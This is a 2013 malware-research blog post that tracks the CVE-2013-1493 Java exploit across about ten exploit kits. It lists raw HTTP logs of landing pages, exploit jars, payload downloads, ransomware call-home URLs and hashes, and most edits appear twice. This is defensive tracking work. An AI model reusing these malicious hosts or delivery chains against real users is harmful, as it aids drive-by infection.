2013-03-09 - Exploit Integration
CVE-2013-1493 (jre17u15 - jre16u41) integrating Exploit Kits
That was fast (4 days after patch). After CVE-2013-0634 (flash), it's now CVE-2013-1493 (last know vulnerability up to jre17u15 - jre16u41) that reach Cool Exploit Kit (from Reveton distributor - btw this ransomware seems to be clothed again with what i called the Winter II design)
Credits first :
Will Metcalf from Emerging Threats for the "path" part of the landing.
Michael Schierl for confirming (and giving more clues) that it looks like CVE-2013-1493.
Chris Wakelin for additional tips
I will update here integration in other exploit kits
Cool EK (2013-03-08):
jre17u15:
.png) |
| CVE-2013-1493 successful path in Cool EK (jre17u15) 2013-03-08 |
.png){kind=link}
jre16u41:
.png) |
| CVE-2013-1493 successfull path in Cool EK (jre16u41) 2013-03-08 |
GET http://retrempercircum[...].glamorizesports.com/world/bright_rural_mutter.html
200 OK (text/html)
GET http://retrempercircum[...].glamorizesports.com/world/rug-magistrate.jar
200 OK (application/java-archive) a3410c876ed4bb477c153b19eb396f42
GET http://retrempercircum[...].glamorizesports.com/world/improved_violently_section.swf
404 Not Found (text/html)
GET http://[...]/world/getnn.jpg
200 OK (application/x-msdownload) e343845066df8c271b5ac095f2d44183
Out of scope Reveton
.png) |
| Security in jre17u>10 Want to get infected ? follow the bubble |
For java 1.6...things are differents
<edit1: 11/03/13>
Sibhost :
It's now also part of Sibhost.
GET http://[...].bestonlinecourse.net/vs3Mpr1V3t843
200 OK (text/html)
GET http://[...].bestonlinecourse.net/vs3Mpr1V3t843.zip
200 OK (application/octet-stream)
GET http://[...].bestonlinecourse.net/vs3Mpr1V3t843.zip
200 OK (application/octet-stream) c1e430c2bfa13e33915eb69ae2d068b3
POST http://[...].bestonlinecourse.net/vs3Mpr1V3t843?page=1
200 OK (text/html)
GET http://rqwkp.com/xo-cq[...]qejau-bleh[...]ngj-oxbf[...]fz-clzv_g[...]ypr-jpnobwor[...]gux.php
200 OK (application/octet-stream) <-- This is the call home from the ransomware pushed...which is, as you quite surely already know, Urausy (which is sharing Infrastructure with Sibhost EKaas)
Out of scope : Decoded Urausy : fe6562c5d5ba8d04d94f887feef4554d
</edit1>
<edit2 2013-03-22>
Popads :
Now also in Popads:
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor .info/?a293794de46d4f2f3b68d8cc362b4dbe=r30&4ed4f3bcf676d95148f3200035f72eca=pisisisi.biz
200 OK (text/html)
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor .info/276889f7c31a54d8b3e815b50e19d6f4/7d5c1dffc78edaa1bcd7c30ea1163f06.swf
200 OK (application/x-shockwave-flash) CVE-2013-0634 (?) (Lady Boyle)
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor .info/b14b2491b70a82bad87e863cca9129e3.eot
200 OK (application/vnd.ms-fontobject) CVE-2011-3402 (Duqu font drop)
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor .info/ca4893c9c9e3e82df49fa7e5c45ce66a/857b2a729448536bc861dda5bb6c7611.jar
200 OK (application/x-java-archive) dce23897fe0ead232f37957f5606113a (pure Soc. Eng. jar)
.png)
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor .info/276889f7c31a54d8b3e815b50e19d6f4/2b1f14a5e8b0e2ecc2da5ecfcc858a68.jar
200 OK (application/x-java-archive) db951ce79abf44d253c9e1a1c351b8d7 <- CVE-2013-1493
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor .info/ca4893c9c9e3e82df49fa7e5c45ce66a/857b2a729448536bc861dda5bb6c7611.jar
200 OK (application/x-java-archive)
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor .info/276889f7c31a54d8b3e815b50e19d6f4/2b1f14a5e8b0e2ecc2da5ecfcc858a68.jar
200 OK (application/x-java-archive)
GET http://orangemilkwithcoconut .info/cal
200 OK (text/html) <-- Payload for CVE-2013-0634 (?) - cb0c37db071299a26d1e90091e2c511d
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor .info/276889f7c31a54d8b3e815b50e19d6f4/0
200 OK (text/html) <-- Payload for CVE-2013-1493, did not check but quite surely encoded cb0c37db071299a26d1e90091e2c511d
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor .info/276889f7c31a54d8b3e815b50e19d6f4/1
404 Not Found (text/html)
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor info/276889f7c31a54d8b3e815b50e19d6f4/1
404 Not Found (text/html)
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor .info/276889f7c31a54d8b3e815b50e19d6f4/2
404 Not Found (text/html)
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor .info/276889f7c31a54d8b3e815b50e19d6f4/2
404 Not Found (text/html)
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor
.info/276889f7c31a54d8b3e815b50e19d6f4/3
404 Not Found (text/html)
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor
.info/276889f7c31a54d8b3e815b50e19d6f4/3
404 Not Found (text/html)
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor
.info/276889f7c31a54d8b3e815b50e19d6f4/4
404 Not Found (text/html)
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor
.info/276889f7c31a54d8b3e815b50e19d6f4/4
404 Not Found (text/html)
<edit2>
<edit3 2013-03-27>
Styx :
As spotted by PhysicalDrive0
</edit3>
<edit4 2013-03-30>
Sweet Orange :
Appeared today in Sweet Orange
GET http://likethatcool .info/local_url/images/login_db/partners.php?down=14
200 OK (text/html)
GET http://likethatcool .info/local_url/images/login_db/ELlnSIJT.jar
200 OK (application/x-java-archive) <-- CVE-2013-1493 53a1642b910f06c5291f767a52ed6053
GET http://likethatcool .info/local_url/images/login_db/WLlyxc.jar
200 OK (application/x-java-archive) c1c6059b9f4b70a8a2ca38710e773964
GET http://toomchook .info/promotion.php?apply=133&lang=477&speeches=4&staff=91&campaign=171&blogs=259"e=35&arts=337&login=340&watch=687
200 OK (application/octet-stream) Decoded Payload : fd6522e6804f6d3b9558f3f58f2ffde8
</edit4>
<edit5 2013-04-08>
I thought some coders had decided not to integrate that CVE...but...I could keep going in front of their Weapons and wait for CVE-2013-1493 bullets with my 1.7u15 pierced armor. It appears that some Exploit Kits won't shot in this configuration...Coming back with 1.6u41 pierced armor i got shot fast without warning (sometimes (Neutrino) two bullets were required). That's clever ! (Thx to someone who will recognize himself for the hint)
Neutrino :
GET http://creativ.asusdriver.ru/lvstddljqqn?fghrgysxg=8899692
200 OK (text/html)
GET http://creativ.asusdriver.ru/scripts/js/plugin_detector.js
200 OK (application/x-javascript)
GET http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js
200 OK (text/javascript)
POST http://creativ.asusdriver.ru/c77a
200 OK (text/html)
GET http://creativ.asusdriver.ru/eevgnl?hpsbj=516315fdaaa2cc386900003b
200 OK (application/java-archive) <-- CVE-2013-1493 2aa5a4d2556abd0920cc2006aa2401ec
GET http://creativ.asusdriver.ru/ponitydmin?hphinhl=516315fdaaa2cc386900003b
200 OK (application/octet-stream) <- encoded payload out of scope.
Redkit :
GET http://dekoracijebalonima.com/ovrz.html
200 OK (text/html)
GET http://dekoracijebalonima.com/4iq.jar
200 OK (application/java-archive)
GET http://dekoracijebalonima.com/4iq.jar
200 OK (application/java-archive) 4910627c79be585120811077770444d2
GET http://dekoracijebalonima.com/38.html
200 OK (application/octet-stream) <-- Encoded stream (that can eventually be split in two)
Sakura :
GET http://9aa3e2e02c.ieguatahbu.pila.pl:82/forums/see.php
200 OK (text/html)
GET http://9aa3e2e02c.ieguatahbu.pila.pl:82/forums/writeland_care.php
200 OK (application/x-java-archive) 0959955b70879fad6bc2e655e674b93c
GET http://9aa3e2e02c.ieguatahbu.pila.pl:82/forums/856.htm
200 OK (application/octet-stream) Decoded > Zaccess : 8855d880eceafb0d51cd02a664a50d72
</edit5>
<edit6 2013-04-09>
Blackhole :
GET http://kelekpedrillio.me/necessity/cfcfasked.php
200 OK (text/html)
GET http://kelekpedrillio.me/data/getJavaInfo.jar
200 OK (application/java-archive)
GET http://kelekpedrillio.me/necessity/cfcfasked.php?xpuxqlac=vakje&bsxr=wxcdpqk
200 OK (application/java-archive) 05eabb404236f9eaa29c719ff3fb7cc9
GET http://kelekpedrillio.me/necessity/cfcfasked.php?hf=33:1l:32:31:1g&ie=33:1l:2w:1j:2v:1h:1j:33:33:1i&m=1f&eb=r&zg=z
200 OK (application/x-msdownload) Payload : d8ad81aec401c8e8f22175f49dcedfd2 elegantly calling mother on : fuckyouhaha .com
Files:
Cool EK: a3410c876ed4bb477c153b19eb396f42 - 037160d1fc08d1643382233049944246
Sibhost : c1e430c2bfa13e33915eb69ae2d068b3
(nothing more for now)
Post Publication Reading :
Fresh Coffee Served by CoolEK - 2013-03-12 - Dan Meged and Moshe Basanchig - Trustwave
[RU] CVE-2013-1493 ImAlpha, CMM.cmmColorConvert alpha memory corruption - 2013-03-18 - el- - DamageLab
Identity Crisis - Would you consider the phone number of a local dentist private info? After all, a Credit Card number is just a bunch of digits too. - 2013-03-19 - Zubair Ashraf - IBM - X-Force Security Insights Blog
Reading :
YAJ0: Yet Another Java Zero-Day - 2013-02-28 - Darien Kindlund and Yichong Lin - FireEye Blog
CVE-2013-1493 - Mittre
Latest Java Zero-Day Shares Connections with Bit9 Security Incident - 2013-03-01 - Symantec
.png) |
| In jre16 (no comment) |
<edit1: 11/03/13>
Sibhost :
It's now also part of Sibhost.
 |
| CVE-2013-1493 successfull path in Sibhost |
GET http://[...].bestonlinecourse.net/vs3Mpr1V3t843
200 OK (text/html)
GET http://[...].bestonlinecourse.net/vs3Mpr1V3t843.zip
200 OK (application/octet-stream)
GET http://[...].bestonlinecourse.net/vs3Mpr1V3t843.zip
200 OK (application/octet-stream) c1e430c2bfa13e33915eb69ae2d068b3
 |
| Urausy and CVE-2013-1493 in the Jar |
200 OK (text/html)
GET http://rqwkp.com/xo-cq[...]qejau-bleh[...]ngj-oxbf[...]fz-clzv_g[...]ypr-jpnobwor[...]gux.php
200 OK (application/octet-stream) <-- This is the call home from the ransomware pushed...which is, as you quite surely already know, Urausy (which is sharing Infrastructure with Sibhost EKaas)
Out of scope : Decoded Urausy : fe6562c5d5ba8d04d94f887feef4554d
</edit1>
<edit2 2013-03-22>
Popads :
Now also in Popads:
 |
| CVE-2013-1493 Positive path in popads 2013-03-22 (note the successfull CVE-2013-0634 (? - flash) too ) |
200 OK (text/html)
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor .info/276889f7c31a54d8b3e815b50e19d6f4/7d5c1dffc78edaa1bcd7c30ea1163f06.swf
200 OK (application/x-shockwave-flash) CVE-2013-0634 (?) (Lady Boyle)
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor .info/b14b2491b70a82bad87e863cca9129e3.eot
200 OK (application/vnd.ms-fontobject) CVE-2011-3402 (Duqu font drop)
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor .info/ca4893c9c9e3e82df49fa7e5c45ce66a/857b2a729448536bc861dda5bb6c7611.jar
200 OK (application/x-java-archive) dce23897fe0ead232f37957f5606113a (pure Soc. Eng. jar)
.png)
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor .info/276889f7c31a54d8b3e815b50e19d6f4/2b1f14a5e8b0e2ecc2da5ecfcc858a68.jar
200 OK (application/x-java-archive) db951ce79abf44d253c9e1a1c351b8d7 <- CVE-2013-1493
.png) |
| CVE-2013-1493 in Popads jar File |
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor .info/ca4893c9c9e3e82df49fa7e5c45ce66a/857b2a729448536bc861dda5bb6c7611.jar
200 OK (application/x-java-archive)
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor .info/276889f7c31a54d8b3e815b50e19d6f4/2b1f14a5e8b0e2ecc2da5ecfcc858a68.jar
200 OK (application/x-java-archive)
GET http://orangemilkwithcoconut .info/cal
200 OK (text/html) <-- Payload for CVE-2013-0634 (?) - cb0c37db071299a26d1e90091e2c511d
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor .info/276889f7c31a54d8b3e815b50e19d6f4/0
200 OK (text/html) <-- Payload for CVE-2013-1493, did not check but quite surely encoded cb0c37db071299a26d1e90091e2c511d
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor .info/276889f7c31a54d8b3e815b50e19d6f4/1
404 Not Found (text/html)
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor info/276889f7c31a54d8b3e815b50e19d6f4/1
404 Not Found (text/html)
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor .info/276889f7c31a54d8b3e815b50e19d6f4/2
404 Not Found (text/html)
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor .info/276889f7c31a54d8b3e815b50e19d6f4/2
404 Not Found (text/html)
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor
.info/276889f7c31a54d8b3e815b50e19d6f4/3
404 Not Found (text/html)
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor
.info/276889f7c31a54d8b3e815b50e19d6f4/3
404 Not Found (text/html)
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor
.info/276889f7c31a54d8b3e815b50e19d6f4/4
404 Not Found (text/html)
GET http://critical.microsoft.windows.software.update.patch.scvfj.6teligonestor
.info/276889f7c31a54d8b3e815b50e19d6f4/4
404 Not Found (text/html)
<edit2>
<edit3 2013-03-27>
Styx :
As spotted by PhysicalDrive0
 |
| CVE-2013-1493 successful path in Styx 2013-03-27 |
GET http://2reginas.3d-game .com/X7LyCP0B01x0H14r15sqG13YFp0bMJa0lKrJ0HTuA012Sl/
200 OK (text/html)
GET http://2reginas.3d-game .com/X7LyCP0B01x0H14r15sqG13YFp0bMJa0lKrJ0HTuA012Sl/jqCkAryHq.js
200 OK (text/html)
GET http://2reginas.3d-game .com/X7LyCP0B01x0H14r15sqG13YFp0bMJa0lKrJ0HTuA012Sl/oPMwGvKNx.jar
200 OK (text/html)
GET http://2reginas.3d-game .com/X7LyCP0B01x0H14r15sqG13YFp0bMJa0lKrJ0HTuA012Sl/oPMwGvKNx.jar
200 OK (text/html) 028e94104823ce260f2dab3dc9360ebd
GET http://2reginas.3d-game. com/X7LyCP0B01x0H14r15sqG13YFp0bMJa0lKrJ0HTuA012Sl/pdfx.html
200 OK (text/html)
GET http://2reginas.3d-game .com/X7LyCP0B01x0H14r15sqG13YFp0bMJa0lKrJ0HTuA012Sl/umzim.html
200 OK (text/html)
GET http://2reginas.3d-game .com/X7LyCP0B01x0H14r15sqG13YFp0bMJa0lKrJ0HTuA012Sl/jovf.html
200 OK (text/html)
GET http://2reginas.3d-game .com/X7LyCP0B01x0H14r15sqG13YFp0bMJa0lKrJ0HTuA012Sl/LIUibHMD.jar
200 OK (text/html)
GET http://2reginas.3d-game .com/X7LyCP0B01x0H14r15sqG13YFp0bMJa0lKrJ0HTuA012Sl/LIUibHMD.jar
200 OK (text/html) 4a67399ce2fc676f7eeeccc9d52a5a01 <- CVE-2013-1493
 |
| CVE-2013-1493 in Styx |
GET http://2reginas.3d-gam e.com/9O7M7H0UrVQ0ds2f0w3LT0yfcc0yO5O0HTJx0aWvP06gRF0HW3w0peOZ0LchQ0gs7B0ealt11bWf0asdB0rsZG0m3Jl11fSv0R2c6060bt0URUR0NQlS0KBWl0X1xs0XmIH10A3T0T8pS02qSG0PFpi0d7mP0jHyk0NvEa0wv9X0Yv7a16VWP0PPd80apPy0LkeG0WxgF/y1z2icM0VZ.exe?o=1&h=12
200 OK () <-- Note : the empty content-type as spotted by Jerome Segura
275e2e3e2aa534a87368e16a1fda1cba (Urausy Call to home http://rgbrr.net/jv-[redacted]-gnb.php - 91.221.99.26)
<edit4 2013-03-30>
Sweet Orange :
Appeared today in Sweet Orange
 |
| CVE-2013-1493 positive path in Sweet Orange 2013-03-30 |
200 OK (text/html)
GET http://likethatcool .info/local_url/images/login_db/ELlnSIJT.jar
200 OK (application/x-java-archive) <-- CVE-2013-1493 53a1642b910f06c5291f767a52ed6053
 |
| Piece of CVE-2013-1493 in ELlnSIJT.jar from SWT |
GET http://likethatcool .info/local_url/images/login_db/WLlyxc.jar
200 OK (application/x-java-archive) c1c6059b9f4b70a8a2ca38710e773964
GET http://toomchook .info/promotion.php?apply=133&lang=477&speeches=4&staff=91&campaign=171&blogs=259"e=35&arts=337&login=340&watch=687
200 OK (application/octet-stream) Decoded Payload : fd6522e6804f6d3b9558f3f58f2ffde8
</edit4>
<edit5 2013-04-08>
I thought some coders had decided not to integrate that CVE...but...I could keep going in front of their Weapons and wait for CVE-2013-1493 bullets with my 1.7u15 pierced armor. It appears that some Exploit Kits won't shot in this configuration...Coming back with 1.6u41 pierced armor i got shot fast without warning (sometimes (Neutrino) two bullets were required). That's clever ! (Thx to someone who will recognize himself for the hint)
Neutrino :
 |
| CVE-2013-1493 Positive path for Neutrino on 1.6 branch 2013-04-08 |
GET http://creativ.asusdriver.ru/lvstddljqqn?fghrgysxg=8899692
200 OK (text/html)
GET http://creativ.asusdriver.ru/scripts/js/plugin_detector.js
200 OK (application/x-javascript)
GET http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js
200 OK (text/javascript)
POST http://creativ.asusdriver.ru/c77a
200 OK (text/html)
GET http://creativ.asusdriver.ru/eevgnl?hpsbj=516315fdaaa2cc386900003b
200 OK (application/java-archive) <-- CVE-2013-1493 2aa5a4d2556abd0920cc2006aa2401ec
 |
| Part of CVE-2013-1493 in Neutrino |
GET http://creativ.asusdriver.ru/ponitydmin?hphinhl=516315fdaaa2cc386900003b
200 OK (application/octet-stream) <- encoded payload out of scope.
Redkit :
 |
| CVE-2013-1493 in Redkit Exploit Kit. Branch 1.6 on 2013-04-08 |
GET http://dekoracijebalonima.com/ovrz.html
200 OK (text/html)
GET http://dekoracijebalonima.com/4iq.jar
200 OK (application/java-archive)
GET http://dekoracijebalonima.com/4iq.jar
200 OK (application/java-archive) 4910627c79be585120811077770444d2
 |
| CVE-2013-1493 in Redkit for java branch 1.6 |
GET http://dekoracijebalonima.com/38.html
200 OK (application/octet-stream) <-- Encoded stream (that can eventually be split in two)
Sakura :
 |
| CVE-2013-1493 in Sakura (jre1.6 branch) |
200 OK (text/html)
GET http://9aa3e2e02c.ieguatahbu.pila.pl:82/forums/writeland_care.php
200 OK (application/x-java-archive) 0959955b70879fad6bc2e655e674b93c
 |
| Piece of CVE-2013-1493 in Sakura jar |
200 OK (application/octet-stream) Decoded > Zaccess : 8855d880eceafb0d51cd02a664a50d72
</edit5>
<edit6 2013-04-09>
Blackhole :
 |
| CVE-2013-1493 in BH EK 2013-04-09 (jre1.6 branch) |
200 OK (text/html)
GET http://kelekpedrillio.me/data/getJavaInfo.jar
200 OK (application/java-archive)
GET http://kelekpedrillio.me/necessity/cfcfasked.php?xpuxqlac=vakje&bsxr=wxcdpqk
200 OK (application/java-archive) 05eabb404236f9eaa29c719ff3fb7cc9
 |
| CVE-2013-1493 in BH EK self-signed Jar - 2013-04-09 |
200 OK (application/x-msdownload) Payload : d8ad81aec401c8e8f22175f49dcedfd2 elegantly calling mother on : fuckyouhaha .com
<edit6>
<edit7 2013-04-26>
WhiteHole :
Spotted by @PhysicalDrive0
GET http://1366979417.hopto .org/temp/newyear/9da6183/?cmp=98
200 OK (text/html)
GET http://1366979417.hopto .org/temp/newyear/deployJava.js
200 OK (application/javascript)
GET http://1366979417.hopto .org/temp/newyear/e45d9/?java=98
200 OK (text/html)
GET http://1366979417.hopto .org/temp/newyear/JavaN.jar?java=98
200 OK (application/java-archive) 42e260c17815d12c8f6bd32f59f4710e
GET http://1366979417.hopto .org/temp/newyear/-98796655/?whole=98
302 Found to http://1366979417.hopto.org/temp/softl98ii.exe
GET http://1366979417.hopto .org/temp/softl98ii.exe
200 OK (application/x-msdos-program) 0e3d1861fd160816b8d281098eb74577 (Urausy)
GET http://1366979417.hopto .org/temp/newyear/-98796655/?whole=9802
302 Found to http://1366979417.hopto.org/temp/pod.exe
GET http://1366979417.hopto .org/temp/pod.exe
200 OK (application/x-msdos-program) 31396b97cbdc61680b908ec1519cab09 (Zaccess)
GET http://1366979417.hopto .org/temp/newyear/-98796655/?whole=9803
302 Found to http://1366979417.hopto.org
GET http://1366979417.hopto.org/
200 This buggy server did not return headers ()
</edit7>
<edit7 2013-04-26>
WhiteHole :
Spotted by @PhysicalDrive0
 |
| Tweet from PhysicalDrive0 notifying that Whitehole has integrated CVE-2013-1493 |
 |
| CVE-2013-2493 Successful path in WhiteHole 2013-04-26 |
200 OK (text/html)
GET http://1366979417.hopto .org/temp/newyear/deployJava.js
200 OK (application/javascript)
GET http://1366979417.hopto .org/temp/newyear/e45d9/?java=98
200 OK (text/html)
GET http://1366979417.hopto .org/temp/newyear/JavaN.jar?java=98
200 OK (application/java-archive) 42e260c17815d12c8f6bd32f59f4710e
 |
| CVE-2013-1493 in javaN.jar from WhiteHole EK |
GET http://1366979417.hopto .org/temp/newyear/-98796655/?whole=98
302 Found to http://1366979417.hopto.org/temp/softl98ii.exe
GET http://1366979417.hopto .org/temp/softl98ii.exe
200 OK (application/x-msdos-program) 0e3d1861fd160816b8d281098eb74577 (Urausy)
 |
| Urausy US part of Design 2013-04-26 |
GET http://1366979417.hopto .org/temp/newyear/-98796655/?whole=9802
302 Found to http://1366979417.hopto.org/temp/pod.exe
GET http://1366979417.hopto .org/temp/pod.exe
200 OK (application/x-msdos-program) 31396b97cbdc61680b908ec1519cab09 (Zaccess)
GET http://1366979417.hopto .org/temp/newyear/-98796655/?whole=9803
302 Found to http://1366979417.hopto.org
GET http://1366979417.hopto.org/
200 This buggy server did not return headers ()
</edit7>
Files:
Cool EK: a3410c876ed4bb477c153b19eb396f42 - 037160d1fc08d1643382233049944246
Sibhost : c1e430c2bfa13e33915eb69ae2d068b3
(nothing more for now)
Post Publication Reading :
Fresh Coffee Served by CoolEK - 2013-03-12 - Dan Meged and Moshe Basanchig - Trustwave
[RU] CVE-2013-1493 ImAlpha, CMM.cmmColorConvert alpha memory corruption - 2013-03-18 - el- - DamageLab
Identity Crisis - Would you consider the phone number of a local dentist private info? After all, a Credit Card number is just a bunch of digits too. - 2013-03-19 - Zubair Ashraf - IBM - X-Force Security Insights Blog
Reading :
YAJ0: Yet Another Java Zero-Day - 2013-02-28 - Darien Kindlund and Yichong Lin - FireEye Blog
CVE-2013-1493 - Mittre
Latest Java Zero-Day Shares Connections with Bit9 Security Incident - 2013-03-01 - Symantec